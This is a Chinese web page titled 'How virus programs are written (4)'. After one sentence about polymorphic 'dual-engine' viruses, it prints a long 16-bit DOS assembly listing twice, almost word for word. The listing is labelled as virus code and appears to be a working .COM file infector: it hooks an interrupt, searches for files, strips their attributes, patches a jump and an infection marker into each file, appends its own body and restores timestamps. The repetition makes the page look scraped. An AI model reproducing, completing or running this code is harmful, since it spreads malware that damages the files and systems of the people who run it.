病毒程序是怎么写的( 四 ) _是怎么

到了后期甚至有人写出所谓的"双体引擎"，可以把一种病毒创造出更多元化的面貌，让人防不胜防！而病毒发作的症状更是各式各样。
4. 病毒程序如何编写 16位病毒代码JMP 041D MOV CX,F000 MOV AL,00 MOV BX,0180 CMP WORD PTR [BX],CCCC JZ 02B1 INC BX LOOP 02A8 ADD BX,+64 NOP JMP 02B9 JMP 02D9 MOV [FFC0],BX NOP NOP NOP NOP NOP CLD MOV SI,[FFC0] ADD SI,+02 MOV DI,0050 ADD DI,00B0 MOV CX,0005 NOP REPZ MOVSB JMP 02B7 XOR AX,AX MOV DS,AX MOV AX,[0090] MOV CX,[0092] PUSH CS POP DS MOV BX,[FFC0] ADD BX,+2D MOV [BX],AX ADD BX,+02 MOV [BX],CX MOV BX,[FFC0] ADD BX,+2C MOV CX,BX XOR AX,AX MOV DS,AX MOV [0090],CX MOV [0092],CS PUSH CS POP DS JMP 0381 NOP INT 3 INT 3 MOV BX,0464 MOV SP,BX NOP NOP NOP NOP MOV BX,[FFC0] ADD BX,+2D MOV AX,[BX] ADD BX,+02 MOV CX,[BX] PUSH AX XOR AX,AX MOV DS,AX POP AX MOV [0090],AX MOV [0092],CX PUSH CS POP DS JMP 0100 NOP IRET NOP NOP NOP NOP ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI+5C2E],DL SUB CH,[6F63] DB 6D ADD [BX+SI+9090],DL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL NOP MOV BX,[FFC0] ADD BX,+31 CMP WORD PTR [BX],0A00 JNB 0395 MOV AX,[BX] INC AX MOV [BX],AX JMP 03BB MOV DX,03C4 MOV AL,01 OUT DX,AL MOV DX,03C5 IN AL,DX MOV BL,20 OR AL,BL OUT DX,AL JMP 03BB NOP JMP 05E8 MOV AH,40 JMP 04FA MOV AH,40 JMP 0514 MOV AH,40 JMP 0528 JMP 0348 MOV DX,[FFC0] ADD DX,+41 NOP MOV AH,1A INT 21 MOV AH,4E MOV CX,0027 MOV DX,[FFC0] ADD DX,+37 NOP INT 21 JNB 03DB JMP 0319 MOV BX,[FFC0] ADD BX,+5D NOP MOV CX,[BX] JCXZ 03EA JMP 057A SUB BX,+02 MOV AX,[BX] CMP AX,0082 JNB 03F7 JMP 057A CMP AX,EF00 JBE 03FF JMP 057A MOV DX,[FFC0] ADD DX,+5F NOP MOV AX,4300 INT 21 JNB 0411 JMP 0319 MOV BX,[FFC0] ADD BX,+71 NOP MOV [BX],CX JNB 0420 JMP 02A0 MOV AX,4301 MOV CX,0020 INT 21 JNB 0430 JMP 0319 JMP 0520 MOV AX,3D02 INT 21 JNB 043A JMP 0319 PUSH AX JMP 0580 NOP XOR DX,DX MOV AX,4200 INT 21 JNB 044C POP AX JMP 0319 MOV AH,3F MOV CX,0005 MOV DX,[FFC0] ADD DX,+02 NOP INT 21 JNB 0461 POP AX JMP 0319 MOV BX,[FFC0] ADD BX,+05 NOP CMP WORD PTR [BX],CDCD JNZ 0472 JMP 0576 POP BX PUSH BX XOR CX,CX XOR DX,DX MOV AX,4200 INT 21 MOV BX,FE00 MOV BYTE PTR [BX],E9 MOV BX,[FFC0] ADD BX,+5B MOV AX,[BX] INC AX SUB AX,0083 ADD AX,007F MOV BX,FE01 MOV [BX],AX MOV AX,CDCD MOV BX,FE03 MOV [BX],AX MOV AH,40 MOV CX,0005 POP BX PUSH BX MOV DX,FE00 INT 21 JNB 04B2 POP AX JMP 031F XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV BX,FF00 MOV BYTE PTR [BX],E9 MOV BX,[FFC0] ADD BX,+5B MOV AX,[BX] INC AX ADD AX,0018 MOV BX,FF7D SUB BX,AX MOV AX,BX MOV BX,FF01 MOV [BX],AX JMP 04E1 JMP 0466 JMP 061D POP BX PUSH BX XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV DX,[FFC0] SUB DX,+71 NOP MOV CX,0099 JMP 03AA INT 21 JNB 0502 POP CX JMP 0319 XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV DX,FF00 MOV CX,0003 JMP 03AF INT 21 JNB 051C POP CX JMP 0319 XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 JMP 03B4 MOV DX,[FFC0] ADD DX,+2B NOP MOV CX,0265 INT 21 JNB 053B POP CX JMP 0319 POP BX CALL 0542 JMP 0319 MOV AX,5701 MOV CX,[F500] MOV DX,[F502] INT 21 JNB 0552 RET MOV AH,3E INT 21 JNB 055B RET NOP NOP MOV BX,[FFC0] ADD BX,+71 NOP MOV CX,[BX] MOV DX,[FFC0] ADD DX,+5F NOP MOV AX,4301 INT 21 JNB 0575 RET RET POP BX CALL 0542 MOV AH,4F JMP 03C9 NOP PUSH AX MOV BX,AX MOV AX,5700 INT 21 JNB 058D JMP 031A MOV [F500],CX MOV [F502],DX POP BX XOR CX,CX JMP 0440 NOP NOP RET INC DI CMP DI,+3C 。
5. 病毒程序如何编写 16位病毒代码JMP 041D MOV CX,F000 MOV AL,00 MOV BX,0180 CMP WORD PTR [BX],CCCC JZ 02B1 INC BX LOOP 02A8 ADD BX,+64 NOP JMP 02B9 JMP 02D9 MOV [FFC0],BX NOP NOP NOP NOP NOP CLD MOV SI,[FFC0] ADD SI,+02 MOV DI,0050 ADD DI,00B0 MOV CX,0005 NOP REPZ MOVSB JMP 02B7 XOR AX,AX MOV DS,AX MOV AX,[0090] MOV CX,[0092] PUSH CS POP DS MOV BX,[FFC0] ADD BX,+2D MOV [BX],AX ADD BX,+02 MOV [BX],CX MOV BX,[FFC0] ADD BX,+2C MOV CX,BX XOR AX,AX MOV DS,AX MOV [0090],CX MOV [0092],CS PUSH CS POP DS JMP 0381 NOP INT 3 INT 3 MOV BX,0464 MOV SP,BX NOP NOP NOP NOP MOV BX,[FFC0] ADD BX,+2D MOV AX,[BX] ADD BX,+02 MOV CX,[BX] PUSH AX XOR AX,AX MOV DS,AX POP AX MOV [0090],AX MOV [0092],CX PUSH CS POP DS JMP 0100 NOP IRET NOP NOP NOP NOP ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI+5C2E],DL SUB CH,[6F63] DB 6D ADD [BX+SI+9090],DL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL ADD [BX+SI],AL NOP MOV BX,[FFC0] ADD BX,+31 CMP WORD PTR [BX],0A00 JNB 0395 MOV AX,[BX] INC AX MOV [BX],AX JMP 03BB MOV DX,03C4 MOV AL,01 OUT DX,AL MOV DX,03C5 IN AL,DX MOV BL,20 OR AL,BL OUT DX,AL JMP 03BB NOP JMP 05E8 MOV AH,40 JMP 04FA MOV AH,40 JMP 0514 MOV AH,40 JMP 0528 JMP 0348 MOV DX,[FFC0] ADD DX,+41 NOP MOV AH,1A INT 21 MOV AH,4E MOV CX,0027 MOV DX,[FFC0] ADD DX,+37 NOP INT 21 JNB 03DB JMP 0319 MOV BX,[FFC0] ADD BX,+5D NOP MOV CX,[BX] JCXZ 03EA JMP 057A SUB BX,+02 MOV AX,[BX] CMP AX,0082 JNB 03F7 JMP 057A CMP AX,EF00 JBE 03FF JMP 057A MOV DX,[FFC0] ADD DX,+5F NOP MOV AX,4300 INT 21 JNB 0411 JMP 0319 MOV BX,[FFC0] ADD BX,+71 NOP MOV [BX],CX JNB 0420 JMP 02A0 MOV AX,4301 MOV CX,0020 INT 21 JNB 0430 JMP 0319 JMP 0520 MOV AX,3D02 INT 21 JNB 043A JMP 0319 PUSH AX JMP 0580 NOP XOR DX,DX MOV AX,4200 INT 21 JNB 044C POP AX JMP 0319 MOV AH,3F MOV CX,0005 MOV DX,[FFC0] ADD DX,+02 NOP INT 21 JNB 0461 POP AX JMP 0319 MOV BX,[FFC0] ADD BX,+05 NOP CMP WORD PTR [BX],CDCD JNZ 0472 JMP 0576 POP BX PUSH BX XOR CX,CX XOR DX,DX MOV AX,4200 INT 21 MOV BX,FE00 MOV BYTE PTR [BX],E9 MOV BX,[FFC0] ADD BX,+5B MOV AX,[BX] INC AX SUB AX,0083 ADD AX,007F MOV BX,FE01 MOV [BX],AX MOV AX,CDCD MOV BX,FE03 MOV [BX],AX MOV AH,40 MOV CX,0005 POP BX PUSH BX MOV DX,FE00 INT 21 JNB 04B2 POP AX JMP 031F XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV BX,FF00 MOV BYTE PTR [BX],E9 MOV BX,[FFC0] ADD BX,+5B MOV AX,[BX] INC AX ADD AX,0018 MOV BX,FF7D SUB BX,AX MOV AX,BX MOV BX,FF01 MOV [BX],AX JMP 04E1 JMP 0466 JMP 061D POP BX PUSH BX XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV DX,[FFC0] SUB DX,+71 NOP MOV CX,0099 JMP 03AA INT 21 JNB 0502 POP CX JMP 0319 XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 MOV DX,FF00 MOV CX,0003 JMP 03AF INT 21 JNB 051C POP CX JMP 0319 XOR CX,CX XOR DX,DX MOV AX,4202 INT 21 JMP 03B4 MOV DX,[FFC0] ADD DX,+2B NOP MOV CX,0265 INT 21 JNB 053B POP CX JMP 0319 POP BX CALL 0542 JMP 0319 MOV AX,5701 MOV CX,[F500] MOV DX,[F502] INT 21 JNB 0552 RET MOV AH,3E INT 21 JNB 055B RET NOP NOP MOV BX,[FFC0] ADD BX,+71 NOP MOV CX,[BX] MOV DX,[FFC0] ADD DX,+5F NOP MOV AX,4301 INT 21 JNB 0575 RET RET POP BX CALL 0542 MOV AH,4F JMP 03C9 NOP PUSH AX MOV BX,AX MOV AX,5700 INT 21 JNB 058D JMP 031A MOV [F500],CX MOV [F502],DX POP BX XOR CX,CX JMP 0440 NOP NOP RET INC DI CMP DI,+3C 。